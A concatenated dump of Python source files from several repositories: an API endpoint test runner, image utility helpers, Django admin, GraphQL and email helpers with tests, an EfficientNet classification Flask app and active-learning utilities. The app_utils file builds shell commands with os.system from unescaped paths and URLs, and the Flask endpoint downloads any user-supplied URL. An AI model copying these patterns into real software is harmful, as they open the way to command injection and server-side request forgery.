lambda each: each.rstrip("s"),
config["active_tasks"][module_split[0]][module_split[1]],
)
or "*" in config["active_tasks"][module_split[0]][module_split[1]]
):
ic(f"importing {full_name}")
import_submodules(full_name)
elif len(module_split) == 4:
ic(f"importing {full_name}")
import_submodules(full_name)
else:
ic(f"skipping {module_short_name}")
import_submodules(apis)
```
#### File: src/unit-test/test.py
```python
import easyargs
import json
import sys
import requests
from exitstatus import ExitStatus
global nb_total_tests
global nb_test_ran, nb_test_passed, nb_test_failed, nb_test_skipped
global test_final_status
global status_passed, status_failed, status_skipped
status_passed = "🟢"
status_skipped = "🟡"
status_failed = "🔴"
def get_nb_tests(url, header, endpoints, specific_endpoints):
nb_total_tests = 0
for path, details in endpoints['paths'].items():
if specific_endpoints:
if path in specific_endpoints:
nb_total_tests += get_nb_models(url, path, header)
else:
nb_total_tests += get_nb_models(url, path, header)
return nb_total_tests
def get_nb_models(url, path, header):
response = requests.get(f'{url}{path}', headers=header)
models = response.json()
return len(models)
def perform_test(details, url, header, path):
global nb_test_ran, nb_test_passed, nb_test_failed, nb_test_skipped
global test_final_status
global status_passed, status_failed, status_skipped
global nb_total_tests
tag = details['get']['tags'][0]
response = requests.get(f'{url}{path}', headers=header)
models = response.json()
for model in models:
input, output, task = details['post']['tags'][0].split('.')
status = ""
if input == 'image':
params = (
('model', model),
)
files = {
'image': ('test.jpg', open('test.jpg', 'rb')),
}
response = requests.post(f'{url}{path}', headers=header, params=params, files=files)
if response.status_code == 200:
nb_test_passed += 1
status = status_passed
else:
nb_test_failed += 1
status = status_failed
test_final_status = ExitStatus.failure
elif input == 'text':
params = [
('model', model),
]
for parameter in details['post']['parameters']:
if parameter['schema']['title'] != 'Model':
params.append((parameter['schema']['title'], parameter['schema']['default']))
params = tuple(params)
response = requests.post(f'{url}{path}', headers=header, params=params)
if response.status_code == 200:
status = status_passed
nb_test_passed += 1
else:
status = status_failed
nb_test_failed += 1
test_final_status = ExitStatus.failure
nb_test_ran += 1
progress = round((nb_test_ran / nb_total_tests)*100, 2)
print(f"| |__ {status} {model} ({progress}%) <{response.status_code}>")
print("|")
@easyargs
def main(url, bearer_token='', specific_endpoints=None):
if specific_endpoints:
specific_endpoints = specific_endpoints.split(',')
else:
specific_endpoints = []
header = {'Authorization': 'Bearer ' + bearer_token}
response = requests.get(f'{url}/openapi.json', headers=header)
endpoints = response.json()
print()
print(f"Testing endpoints")
print()
global nb_total_tests, nb_test_ran, nb_test_passed, nb_test_failed, nb_test_skipped
global test_final_status
nb_test_skipped = 0
nb_test_passed = 0
nb_test_failed = 0
nb_test_ran = 0
nb_total_tests = get_nb_tests(url, header, endpoints, specific_endpoints)
test_final_status = ExitStatus.success
for path, details in endpoints['paths'].items():
print(f"|__ {path}")
if specific_endpoints:
if path in specific_endpoints:
perform_test(details, url, header, path)
nb_test_ran += 1
else:
print(f"| |__ {status_skipped} <Skipped>")
print(f"|")
nb_test_skipped += 1
else:
perform_test(details, url, header, path)
nb_test_ran += 1
if test_final_status == ExitStatus.success:
str_final_status = "Success"
else:
str_final_status = "Failure"
print(f"""
Final status: {str_final_status}
Test Passed: {nb_test_passed}/{nb_total_tests} ({round((nb_test_passed / nb_total_tests)*100, 2)}%)
Test Failed: {nb_test_failed}/{nb_total_tests} ({round((nb_test_failed / nb_total_tests)*100, 2)}%)
Test Skipped: {nb_test_skipped}
""")
sys.exit(test_final_status)
if __name__ == '__main__':
main()
``` |
{
"source": "jqueguiner/ai-api-template",
"score": 3
} |
#### File: ai-api-template/src/app_utils.py
```python
import os
import requests
import random
import _thread as thread
from uuid import uuid4
import numpy as np
import skimage
from skimage.filters import gaussian
import zipfile
from PIL import Image
import matplotlib.image as mpimg
import cv2
def blur(image, x0, x1, y0, y1, sigma=1, multichannel=True):
y0, y1 = min(y0, y1), max(y0, y1)
x0, x1 = min(x0, x1), max(x0, x1)
im = image.copy()
sub_im = im[y0:y1,x0:x1].copy()
blur_sub_im = gaussian(sub_im, sigma=sigma, multichannel=multichannel)
blur_sub_im = np.round(255 * blur_sub_im)
im[y0:y1,x0:x1] = blur_sub_im
return im
def download(url, filename):
data = requests.get(url).content
with open(filename, 'wb') as handler:
handler.write(data)
return filename
def generate_random_filename(upload_directory, extension):
filename = str(uuid4())
filename = os.path.join(upload_directory, filename + "." + extension)
return filename
def clean_me(filename):
if os.path.exists(filename):
os.remove(filename)
def clean_all(files):
for me in files:
clean_me(me)
def create_directory(path):
os.system("mkdir -p %s" % os.path.dirname(path))
def get_model_bin(url, output_path):
if not os.path.exists(output_path):
create_directory(output_path)
cmd = "wget -O %s %s" % (output_path, url)
os.system(cmd)
return output_path
#model_list = [(url, output_path), (url, output_path)]
def get_multi_model_bin(model_list):
for m in model_list:
thread.start_new_thread(get_model_bin, m)
def unzip(path_to_zip_file, directory_to_extract_to='.'):
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(directory_to_extract_to)
def resize_img_in_folder(path, w, h):
dirs = os.listdir(path)
for item in dirs:
if os.path.isfile(path+item):
im = Image.open(path+item)
f, e = os.path.splitext(path+item)
imResize = im.resize((w, h), Image.ANTIALIAS)
imResize.save(f + '.jpg', 'JPEG', quality=90)
def resize_img(path, w, h):
img = mpimg.imread(path)
img = cv2.resize(img, dsize=(w, h))
return img
``` |
{
"source": "jqueguiner/ai-django-core",
"score": 2
} |
#### File: admin/model_admins/inlines.py
```python
from django.contrib import admin
class ReadOnlyTabularInline(admin.TabularInline):
"""
Class for being extended by TabularInline-classes.
Disables all create, delete or edit functionality in the tabular inline admin.
"""
can_delete = False
def has_add_permission(self, *args, **kwargs):
return False
def has_change_permission(self, *args, **kwargs):
return False
def has_delete_permission(self, *args, **kwargs):
return False
def get_readonly_fields(self, request, obj=None):
result = list(set(
[field.name for field in self.opts.local_fields] +
[field.name for field in self.opts.local_many_to_many]
))
result.remove('id')
return result
```
#### File: graphql/schemes/mutations.py
```python
import graphene
from django.utils.decorators import method_decorator
from graphql import GraphQLError
from graphql_jwt.decorators import login_required
class DeleteMutation(graphene.ClientIDMutation):
"""
Provides a mutation for handling common delete cases. Exposes methods for custom validation and queryset filtering.
"""
success = graphene.Boolean()
model = None
class Meta:
abstract = True
class Input:
id = graphene.ID()
@classmethod
def __init_subclass_with_meta__(cls, resolver=None, output=None, arguments=None, _meta=None, model=None, **options):
if not model:
raise AttributeError('DeleteMutation needs a valid model to be set.')
super().__init_subclass_with_meta__(resolver, output, arguments, _meta, **options)
cls.model = model
@classmethod
def validate(cls, request):
"""
Feel free to put any kind of custom validation rules here
"""
return True
@classmethod
def get_queryset(cls, request):
"""
Defines the queryset on which the object with the given ID can be chosen
"""
return cls.model.objects.all()
@classmethod
def mutate_and_get_payload(cls, root, info, **input_data):
"""
Ensure custom validation, fetch object and delete it afterwards.
"""
if not cls.validate(info.context):
raise GraphQLError('Delete method not allowed.')
# Get object id
object_id = int(input_data.get('id', None))
# Find and delete object
obj = cls.get_queryset(info.context).get(pk=object_id)
obj.delete()
# Return success
return DeleteMutation()
@method_decorator(login_required, name='mutate_and_get_payload')
class LoginRequiredDeleteMutation(DeleteMutation):
"""
Deletes an object from the database.
Ensures user is authenticated with GraphQL-JWT
"""
class Meta:
abstract = True
```
#### File: graphql/tests/base_test.py
```python
import json
from django.test import TestCase, Client
class GraphQLTestCase(TestCase):
"""
Provides a best-practice wrapper for easily testing GraphQL endpoints.
"""
# URL to graphql endpoint
GRAPHQL_URL = '/graphql/'
# Here you need to set your graphql schema for the tests
GRAPHQL_SCHEMA = None
@classmethod
def setUpClass(cls):
super(GraphQLTestCase, cls).setUpClass()
if not cls.GRAPHQL_SCHEMA:
raise AttributeError('Variable GRAPHQL_SCHEMA not defined in GraphQLTestCase.')
cls._client = Client(cls.GRAPHQL_SCHEMA)
def query(self, query: str, op_name: str = None, input_data: dict = None):
"""
:param query: GraphQL query to run
:param op_name: If the query is a mutation or named query, you must supply the op_name.
For annon queries ("{ ... }"), should be None (default).
:param input_data: If provided, the $input variable in GraphQL will be set to this value
:return: Response object from client
"""
body = {'query': query}
if op_name:
body['operation_name'] = op_name
if input_data:
body['variables'] = {'input': input_data}
resp = self._client.post(self.GRAPHQL_URL, json.dumps(body),
content_type='application/json')
return resp
def assertResponseNoErrors(self, resp):
"""
Assert that the call went through correctly. 200 means the syntax is ok, if there are no `errors`,
the call was fine.
:resp HttpResponse: Response
"""
content = json.loads(resp.content)
self.assertEqual(resp.status_code, 200)
self.assertNotIn('errors', list(content.keys()))
def assertResponseHasErrors(self, resp):
"""
Assert that the call was failing. Take care: Even with errors, GraphQL returns status 200!
:resp HttpResponse: Response
"""
content = json.loads(resp.content)
self.assertIn('errors', list(content.keys()))
```
#### File: mail/backends/whitelist_smtp.py
```python
import re
from django.conf import settings
from django.core.mail.backends.smtp import EmailBackend as SMTPEmailBackend
class WhitelistEmailBackend(SMTPEmailBackend):
"""
Via the following settings it is possible to configure if mails are sent to all domains.
If not, you can configure a redirect to an inbox via CATCHALL.
EMAIL_BACKEND = 'ai_django_core.mail.backends.whitelist_smtp.WhitelistEmailBackend'
EMAIL_BACKEND_DOMAIN_WHITELIST = ['ambient.digital']
EMAIL_BACKEND_REDIRECT_ADDRESS = <EMAIL>'
If `EMAIL_BACKEND_REDIRECT_ADDRESS` is set, a mail to `<EMAIL>` will be redirected to
`<EMAIL>`
"""
@staticmethod
def get_domain_whitelist() -> list:
"""
Getter for configuration variable from the settings.
Will return a list of domains: ['ambient.digital', 'ambient.digital']
"""
return getattr(settings, 'EMAIL_BACKEND_DOMAIN_WHITELIST', [])
@staticmethod
def get_email_regex():
"""
Getter for configuration variable from the settings.
Will return a RegEX to match email whitelisted domains.
"""
return r'^[\w\-\.]+@(%s)$' % '|'.join(x for x in
WhitelistEmailBackend.get_domain_whitelist()).replace('.', r'\.')
@staticmethod
def get_backend_redirect_address() -> str:
"""
Getter for configuration variable from the settings.
Will return a string with a placeholder for redirecting non-whitelisted domains.
"""
return getattr(settings, 'EMAIL_BACKEND_REDIRECT_ADDRESS')
@staticmethod
def whitify_mail_addresses(mail_address_list: list) -> list:
"""
Check for every recipient in the list if its domain is included in the whitelist.
If not, and we have a redirect address configured, we change the original mail address to something new,
according to our configuration.
"""
allowed_recipients = []
for to in mail_address_list:
if re.search(WhitelistEmailBackend.get_email_regex(), to):
allowed_recipients.append(to)
elif WhitelistEmailBackend.get_backend_redirect_address():
# Send not allowed emails to the configured redirect address (with CATCHALL)
allowed_recipients.append(WhitelistEmailBackend.get_backend_redirect_address() % to.replace('@', '_'))
return allowed_recipients
def _process_recipients(self, email_messages):
"""
Helper method to wrap custom logic of this backend. Required to make it testable.
"""
for email in email_messages:
allowed_recipients = self.whitify_mail_addresses(email.to)
email.to = allowed_recipients
return email_messages
def send_messages(self, email_messages):
"""
Checks if email-recipients are in allowed domains and cancels if not.
Uses regular smtp-sending afterwards.
"""
email_messages = self._process_recipients(email_messages)
super().send_messages(email_messages)
```
#### File: ai-django-core/ai_django_core/managers.py
```python
from django.db.models import QuerySet, Manager
class AbstractPermissionMixin:
"""
Mixin that provides an interface for a basic per-object permission system.
Single objects cannot be checked individually, but can be matched with the corresponding query set.
Please append further methods here, if necessary, in order to make them accessible at all inheriting classes
(query sets AND managers).
"""
def visible_for(self, user):
raise NotImplementedError('Please implement this method')
def editable_for(self, user):
raise NotImplementedError('Please implement this method')
def deletable_for(self, user):
raise NotImplementedError('Please implement this method')
class AbstractUserSpecificQuerySet(QuerySet, AbstractPermissionMixin):
""""
Extend this queryset in your model if you want to implement a visible_for functionality.
"""
def default(self, user):
return self
def visible_for(self, user):
raise NotImplementedError('Please implement this method')
def editable_for(self, user):
raise NotImplementedError('Please implement this method')
def deletable_for(self, user):
raise NotImplementedError('Please implement this method')
class AbstractUserSpecificManager(Manager, AbstractPermissionMixin):
"""
The UserSpecificQuerySet has a method 'as_manger', which can be used for creating a default manager,
which inherits all methods of the queryset and invokes the respective method of it's queryset, respectively.
If the manager has to be declared separately for some reasons, all queryset methods, have to be declared twice,
once in the QuerySet, once in the manager class.
For consistency reasons, both inherit from the same mixin, to ensure the equality of the method's names.
"""
def visible_for(self, user):
return self.get_queryset().visible_for(user)
def editable_for(self, user):
return self.get_queryset().editable_for(user)
def deletable_for(self, user):
return self.get_queryset().deletable_for(user)
class GloballyVisibleQuerySet(AbstractUserSpecificQuerySet):
"""
Manager (QuerySet) for classes which do NOT have any visibility restrictions.
"""
def visible_for(self, user):
return self.all()
def editable_for(self, user):
return self.visible_for(user)
def deletable_for(self, user):
return self.visible_for(user)
```
#### File: ai_django_core/templatetags/ai_date_tags.py
```python
from django import template
register = template.Library()
@register.filter
def format_to_minutes(time):
"""
Converts the seconds to minutes
:param time:
:return minutes:
"""
return time.seconds // 60
```
#### File: ai_django_core/templatetags/ai_file_tags.py
```python
import os
from django import template
from django.conf import settings
register = template.Library()
@register.filter
def filename(value, max_length=25):
"""
Shortens the filename to maxlength 25 without loosing the file extension
:param value:
:param max_length:
:return filename with a max length of 25
"""
name = os.path.basename(value.url)
if len(name) > max_length:
ext = name.split('.')[-1]
name = "%s[..].%s" % (name[:max_length], ext)
return name
@register.filter
def filesize(value):
"""
Returns the filesize of the filename given in value
:param value:
:return filesize:
"""
try:
return os.path.getsize("%s%s" % (settings.MEDIA_ROOT, value))
except Exception:
return 0
```
#### File: ai_django_core/utils/math.py
```python
from math import ceil
def round_to_decimal(value, precision: float = 0.5) -> float:
"""
Helper function to round a given value to a specific precision, for example *.5
So 5.4 will be rounded to 5.5
"""
return round(precision * round(float(value) / precision), 1)
def round_up_decimal(value, precision: float = 0.5) -> float:
"""
Helper function to round a given value up a specific precision, for example *.5
So 5.4 will be rounded to 5.5 and 5.6 to 6.0
"""
return ceil(value * (1 / precision)) / (1 / precision)
```
#### File: ai_django_core/view_layer/views.py
```python
from django.shortcuts import render
from django.views import generic
from django.views.defaults import ERROR_403_TEMPLATE_NAME
from django.views.generic.detail import SingleObjectMixin
class CustomPermissionMixin(generic.View):
"""
This mixin provides the method `validate_permissions()` to create a space where custom, non-django-permissions
can live. This method will be called in the `dispatch()` method to avoid executing unnecessary logic in the
"permission denied" case.
"""
def validate_permissions(self) -> bool:
return True
def dispatch(self, request, *args, **kwargs):
if self.validate_permissions():
return super().dispatch(request, *args, **kwargs)
else:
return render(self.request, ERROR_403_TEMPLATE_NAME, status=403)
class RequestInFormKwargsMixin:
"""
Injects the request in the form.
Attention: Have to be removed in the init of the form (via .pop())
"""
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({'request': self.request})
return kwargs
class ToggleView(SingleObjectMixin, generic.View):
"""
Generic view for updating an object without any user data being sent. Therefore, we don't need a form to validate
user input.
Most common use-case is toggling a flag inside an object.
"""
http_method_names = ('post',)
def post(self, request, *args, **kwargs):
raise NotImplementedError
```
#### File: admin/model_admin_mixins/test_deactivatable_change_view_admin_mixin.py
```python
from unittest import mock
from django.contrib.auth.models import User
from ai_django_core.admin.model_admins.mixins import DeactivatableChangeViewAdminMixin
from ai_django_core.tests.mixins import RequestProviderMixin
from django.contrib import admin
from django.http import HttpResponseRedirect
from django.test import TestCase
class TestAdmin(DeactivatableChangeViewAdminMixin, admin.ModelAdmin):
pass
class DeactivatableChangeViewAdminMixinTest(RequestProviderMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
# Use random model for this meta test
cls.admin = TestAdmin(admin_site=None, model=User)
cls.user = User.objects.create(username="test_user", is_superuser=False)
cls.super_user = User.objects.create(username="super_user", is_superuser=True)
def setUp(self) -> None:
super().setUp()
self.admin.enable_change_view = True
def test_can_see_change_view_positive_flag(self):
self.assertTrue(self.admin.can_see_change_view(request=self.get_request()))
def test_can_see_change_view_negative_flag(self):
self.admin.enable_change_view = False
self.assertFalse(self.admin.can_see_change_view(request=self.get_request()))
def test_get_list_display_links_can_see_method_called(self):
with mock.patch.object(self.admin, 'can_see_change_view', return_value=True) as mock_method:
self.admin.get_list_display_links(request=self.get_request(user=self.user), list_display=('first_name',))
mock_method.assert_called_once()
def test_get_list_display_links_can_see_method_positive_flag(self):
field_tuple = ('first_name',)
self.assertEqual(list(field_tuple),
self.admin.get_list_display_links(request=self.get_request(user=self.user),
list_display=field_tuple))
def test_get_list_display_links_can_see_method_negative_flag(self):
self.admin.enable_change_view = False
self.assertIsNone(self.admin.get_list_display_links(request=self.get_request(user=self.user),
list_display=('first_name',)))
def test_change_view_can_see_method_called_because_of_positive_flag(self):
with mock.patch.object(self.admin, 'can_see_change_view', return_value=True) as mocked_can_see_method:
with mock.patch('django.contrib.admin.ModelAdmin.change_view') as mocked_base_change_view:
self.admin.change_view(request=self.get_request(user=self.super_user), object_id=str(self.user.id))
mocked_can_see_method.assert_called_once()
mocked_base_change_view.assert_called_once()
def test_change_view_can_see_method_not_called_because_of_negative_flag(self):
with mock.patch.object(self.admin, 'can_see_change_view', return_value=False) as mocked_can_see_method:
with mock.patch('django.contrib.admin.ModelAdmin.change_view') as mocked_base_change_view:
self.admin.change_view(request=self.get_request(user=self.super_user), object_id=str(self.user.id))
mocked_can_see_method.assert_called_once()
mocked_base_change_view.assert_not_called()
def test_change_view_can_see_method_not_called_but_redirect(self):
self.admin.enable_change_view = False
result = self.admin.change_view(request=self.get_request(user=self.super_user), object_id=str(self.user.id))
self.assertIsInstance(result, HttpResponseRedirect)
```
#### File: admin/model_admin_mixins/test_fetch_parent_object_inline_mixin.py
```python
from unittest import mock
from django.contrib import admin
from django.contrib.auth.models import User
from django.test import TestCase
from ai_django_core.admin.model_admins.mixins import FetchParentObjectInlineMixin
from ai_django_core.tests.mixins import RequestProviderMixin
from testapp.models import MySingleSignalModel, ForeignKeyRelatedModel
class ForeignKeyRelatedModelTabularInline(FetchParentObjectInlineMixin, admin.TabularInline):
model = ForeignKeyRelatedModel
class TestFetchParentObjectInlineMixinAdmin(admin.ModelAdmin):
inlines = (ForeignKeyRelatedModelTabularInline,)
class MockResolverResponse:
kwargs = None
class FetchParentObjectInlineMixinTest(RequestProviderMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.super_user = User.objects.create(username='super_user', is_superuser=True)
admin.site.register(MySingleSignalModel, TestFetchParentObjectInlineMixinAdmin)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
admin.site.unregister(MySingleSignalModel)
def test_parent_model_is_set(self):
obj = MySingleSignalModel.objects.create(value=1)
model_admin = TestFetchParentObjectInlineMixinAdmin(model=MySingleSignalModel, admin_site=admin.site)
request = self.get_request(self.super_user)
inline_list = model_admin.inlines
self.assertGreater(len(inline_list), 0)
inline = inline_list[0](parent_model=MySingleSignalModel, admin_site=admin.site)
return_obj = MockResolverResponse()
return_obj.kwargs = {'object_id': obj.id}
with mock.patch.object(model_admin.inlines[0], '_resolve_url', return_value=return_obj):
inline.get_formset(request=request, obj=obj)
self.assertEqual(inline.parent_object, obj)
```
#### File: tests/drf/test_fields.py
```python
from django.test import TestCase
from rest_framework import serializers
from rest_framework.serializers import ListSerializer
from ai_django_core.drf.fields import RecursiveField
from testapp.models import ModelWithFkToSelf, ModelWithOneToOneToSelf
class TestManyTrueSerializer(serializers.ModelSerializer):
children = RecursiveField(many=True)
class Meta:
model = ModelWithFkToSelf
fields = [
'id',
'children',
]
class TestManyFalseSerializer(serializers.ModelSerializer):
peer = RecursiveField()
class Meta:
model = ModelWithOneToOneToSelf
fields = [
'id',
'peer',
]
class RecursiveFieldTest(TestCase):
def test_many_true_regular(self):
serializer = TestManyTrueSerializer()
self.assertIn('children', serializer.fields)
self.assertIsInstance(serializer.fields['children'], ListSerializer)
self.assertIsInstance(serializer.fields['children'].child, RecursiveField)
def test_many_true_representation(self):
mwfts_1 = ModelWithFkToSelf.objects.create(parent=None)
mwfts_2 = ModelWithFkToSelf.objects.create(parent=mwfts_1)
serializer = TestManyTrueSerializer(instance=mwfts_1)
representation = serializer.to_representation(instance=mwfts_1)
self.assertIsInstance(representation, dict)
self.assertIn('children', representation)
self.assertEqual(len(representation['children']), 1)
self.assertEqual(representation['children'][0]['id'], mwfts_2.id)
self.assertEqual(representation['children'][0]['children'], [])
def test_many_false_regular(self):
serializer = TestManyFalseSerializer()
self.assertIn('peer', serializer.fields)
self.assertIsInstance(serializer.fields['peer'], RecursiveField)
def test_many_false_representation(self):
mwotos_no_peer = ModelWithOneToOneToSelf.objects.create(peer=None)
mwotos_has_peer = ModelWithOneToOneToSelf.objects.create(peer=mwotos_no_peer)
serializer = TestManyFalseSerializer(instance=mwotos_has_peer)
representation = serializer.to_representation(instance=mwotos_has_peer)
self.assertIsInstance(representation, dict)
self.assertIn('peer', representation)
self.assertEqual(len(representation['peer']), 2)
self.assertEqual(representation['peer']['id'], mwotos_no_peer.id)
self.assertEqual(representation['peer']['peer'], None)
```
#### File: ai-django-core/tests/test_admin_model_admins_classes.py
```python
from django.contrib import admin
from django.contrib.auth.models import User
from django.test import TestCase
from ai_django_core.admin.model_admins.classes import ReadOnlyAdmin, EditableOnlyAdmin
from ai_django_core.tests.mixins import RequestProviderMixin
from testapp.models import MySingleSignalModel, MyMultipleSignalModel
class TestReadOnlyAdmin(ReadOnlyAdmin):
pass
class TestEditableOnlyAdmin(EditableOnlyAdmin):
pass
class AdminClassesTest(RequestProviderMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.super_user = User.objects.create(username='super_user', is_superuser=True)
admin.site.register(MySingleSignalModel, TestReadOnlyAdmin)
admin.site.register(MyMultipleSignalModel, TestEditableOnlyAdmin)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
admin.site.unregister(MySingleSignalModel)
admin.site.unregister(MyMultipleSignalModel)
def test_read_only_admin_all_fields_readonly(self):
obj = MySingleSignalModel(value=1)
admin_class = TestReadOnlyAdmin(model=obj, admin_site=admin.site)
readonly_fields = admin_class.get_readonly_fields(request=self.get_request(), obj=obj)
self.assertEqual(len(readonly_fields), 2)
self.assertIn('id', readonly_fields)
self.assertIn('value', readonly_fields)
def test_read_only_admin_no_change_permissions(self):
admin_class = TestReadOnlyAdmin(model=MySingleSignalModel, admin_site=admin.site)
request = self.get_request(self.super_user)
self.assertFalse(admin_class.has_add_permission(request))
self.assertFalse(admin_class.has_change_permission(request))
self.assertFalse(admin_class.has_delete_permission(request))
def test_editable_only_admin_delete_action_removed(self):
obj = MyMultipleSignalModel(value=1)
admin_class = TestEditableOnlyAdmin(model=obj, admin_site=admin.site)
request = self.get_request(self.super_user)
actions = admin_class.get_actions(request=request)
self.assertNotIn('delete_selected', actions)
def test_editable_only_admin_no_change_permissions(self):
admin_class = TestEditableOnlyAdmin(model=MyMultipleSignalModel, admin_site=admin.site)
request = self.get_request(self.super_user)
self.assertTrue(admin_class.has_change_permission(request))
self.assertFalse(admin_class.has_add_permission(request))
self.assertFalse(admin_class.has_delete_permission(request))
```
#### File: ai-django-core/tests/test_scrubbing_service.py
```python
from django.test import TestCase, override_settings
from ai_django_core.services.custom_scrubber import AbstractScrubbingService
class AbstractScrubbingServiceTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.service = AbstractScrubbingService()
@override_settings(DEBUG=False)
def test_scrubber_debug_mode_needs_to_be_active(self):
self.assertEqual(self.service.process(), False)
@override_settings(DEBUG=True, INSTALLED_APPS=[])
def test_scrubber_needs_to_be_installed(self):
self.assertEqual(self.service.process(), False)
# todo write more tests
```
#### File: tests/view_layer/test_views.py
```python
from django.test import TestCase
from django.views.generic import View
from django.views.generic.detail import SingleObjectMixin
from ai_django_core.tests.mixins import RequestProviderMixin
from ai_django_core.view_layer.views import ToggleView
class ToggleViewTest(RequestProviderMixin, TestCase):
def test_http_method_set_correctly(self):
self.assertEqual(ToggleView.http_method_names, ('post',))
def test_post_raises_not_implemented_error(self):
with self.assertRaises(NotImplementedError):
view = ToggleView()
view.post(request=self.get_request())
def test_class_inherits_from_single_object_mixin(self):
self.assertTrue(issubclass(ToggleView, SingleObjectMixin))
def test_class_inherits_from_generic_view(self):
self.assertTrue(issubclass(ToggleView, View))
``` |
{
"source": "jqueguiner/EfficientNet-api",
"score": 2
} |
#### File: EfficientNet-api/src/app.py
```python
import os
import sys
import subprocess
import requests
import ssl
import random
import string
import json
from flask import jsonify
from flask import Flask
from flask import request
from flask import send_file
import traceback
from app_utils import blur
from app_utils import download
from app_utils import generate_random_filename
from app_utils import clean_me
from app_utils import clean_all
from app_utils import create_directory
from app_utils import get_model_bin
from app_utils import get_multi_model_bin
import torch
from efficientnet_pytorch import EfficientNet
from PIL import Image
from torchvision import transforms
try: # Python 3.5+
from http import HTTPStatus
except ImportError:
try: # Python 3
from http import client as HTTPStatus
except ImportError: # Python 2
import httplib as HTTPStatus
app = Flask(__name__)
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route("/detect", methods=["POST"])
def detect():
input_path = generate_random_filename(upload_directory,"jpg")
try:
if 'file' in request.files:
file = request.files['file']
if allowed_file(file.filename):
file.save(input_path)
try:
top_k = request.form.getlist('top_k')[0]
except:
top_k = 5
else:
url = request.json["url"]
download(url, input_path)
try:
top_k = request.json["top_k"]
except:
top_k = 5
results = []
img = tfms(Image.open(input_path)).unsqueeze(0)
model.eval()
with torch.no_grad():
outputs = model(img)
for idx in torch.topk(outputs, k=int(top_k)).indices.squeeze(0).tolist():
prob = torch.softmax(outputs, dim=1)[0, idx].item()
labels = [x.strip() for x in labels_map[idx].split(',')]
results.append({
'label': labels[0],
'labels': labels,
'score': '{p:.2f}%'.format(p=prob*100)
})
return json.dumps(results), 200
except:
traceback.print_exc()
return {'message': 'input error'}, 400
finally:
clean_all([
input_path
])
if __name__ == '__main__':
global upload_directory, model_directory
global model, labels_map
global tfms
global ALLOWED_EXTENSIONS
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
upload_directory = '/src/upload/'
create_directory(upload_directory)
model_directory = '/src/model/'
create_directory(model_directory)
model_name = 'efficientnet-b5'
model = EfficientNet.from_pretrained(model_name)
model.eval()
model_url = "https://storage.gra.cloud.ovh.net/v1/AUTH_18b62333a540498882ff446ab602528b/pretrained-models/image/EfficientNet-PyTorch/"
labels_file = 'labels_map.txt'
get_model_bin(model_url + labels_file, model_directory + labels_file)
labels_map = json.load(open(model_directory + labels_file))
labels_map = [labels_map[str(i)] for i in range(1000)]
# Preprocess image
tfms = transforms.Compose([transforms.Resize(224), transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),])
port = 5000
host = '0.0.0.0'
app.run(host=host, port=port, threaded=True)
``` |
{
"source": "jqueguiner/haven",
"score": 2
} |
#### File: active_learning/src/active_learning.py
```python
import glob
import pylab as plt
import tqdm
import numpy as np
import torch
import json
import os
from torch.utils.data import sampler
from datetime import datetime
import pytz
import time
from skimage.color import label2rgb
def set_dropout_train(model):
flag = False
for name, module in model.named_modules():
if isinstance(module, torch.nn.Dropout) or isinstance(module, torch.nn.Dropout2d):
flag = True
module.train()
assert(flag)
def mask_to_rle(binmask):
# convert to numpy
if not isinstance(binmask, np.ndarray):
binmask = binmask.cpu().numpy()
# convert to rle
rle = maskUtils.encode(np.asfortranarray(binmask).astype("uint8"))
return rle
def rle_to_mask(rle):
# return a tensor in cuda
return torch.from_numpy(maskUtils.decode(rle))
def xlogy(x, y=None):
z = torch.zeros(())
if y is None:
y = x
assert y.min() >= 0
return x * torch.where(x == 0., z.cuda(), torch.log(y))
def create_tiny(dataset, size=5):
data = [dataset[i] for i in range(size)]
class TinyDataset(torch.nn.Module):
def __init__(self, data):
self.data = data
def __getitem__(self, item):
return self.data[item]
def __len__(self):
return len(self.data)
dataset = TinyDataset(data)
return dataset
@torch.no_grad()
def val_epoch(model, val_loader, epoch):
model.eval()
model.reset_val_metrics()
n_batches = len(val_loader)
pbar = tqdm.tqdm(desc="%d - Validating" % epoch, total=n_batches, leave=False)
for i, batch in enumerate(val_loader):
model.val_step(batch)
score = model.get_val_dict()["val_score"]
pbar.set_description("%d - Validating: %.4f" % (epoch, score))
pbar.update(1)
pbar.close()
return model.get_val_dict()
def assert_dropout_exists(model):
for name, child in model.named_modules():
flag = False
if isinstance(child, torch.nn.Dropout) or isinstance(child, torch.nn.Dropout2d):
flag = True
break
assert flag
def set_dropout_train(model):
for name, module in model.named_modules():
if isinstance(module, torch.nn.Dropout) or isinstance(module, torch.nn.Dropout2d):
module.train()
@torch.no_grad()
def score_pool(pool_set, model, batch_size, heuristic_name, reduction_name, epoch):
model.eval()
set_dropout_train(model)
pool_loader = torch.utils.data.DataLoader(pool_set, shuffle=False, batch_size=batch_size, num_workers=0)
score_list = torch.ones(len(pool_set)) * -1
pbar = tqdm.tqdm(desc="%d - Scoring pool" % epoch, total=len(pool_loader), leave=False)
s_ind = 0
for batch in pool_loader:
scores = heuristics.compute_heuristic_scores(model, batch,
heuristic_name=heuristic_name)
n_scores = len(scores)
if reduction_name == "sum":
scores_reduced = scores.view(n_scores, -1).sum(1)
elif reduction_name == "mean":
scores_reduced = scores.view(n_scores, -1).mean(1)
score_list[s_ind:s_ind+n_scores] = scores_reduced.cpu()
s_ind += n_scores
pbar.set_description("%d - Scoring pool" % epoch)
pbar.update(1)
pbar.close()
assert -1 not in score_list
return score_list
@torch.no_grad()
def get_probabilities_base(pool, model, n_mcmc, batch_size):
model.eval()
pool_loader = torch.utils.data.DataLoader(pool, shuffle=False, batch_size=batch_size)
prob_list = []
pbar = tqdm.tqdm(total=len(pool_loader), leave=False)
for batch in pool_loader:
probs = model.compute_probs(batch, n_mcmc=n_mcmc)
prob_list += [probs.cpu().numpy()]
pbar.set_description("Probs for active learning")
pbar.update(1)
pbar.close()
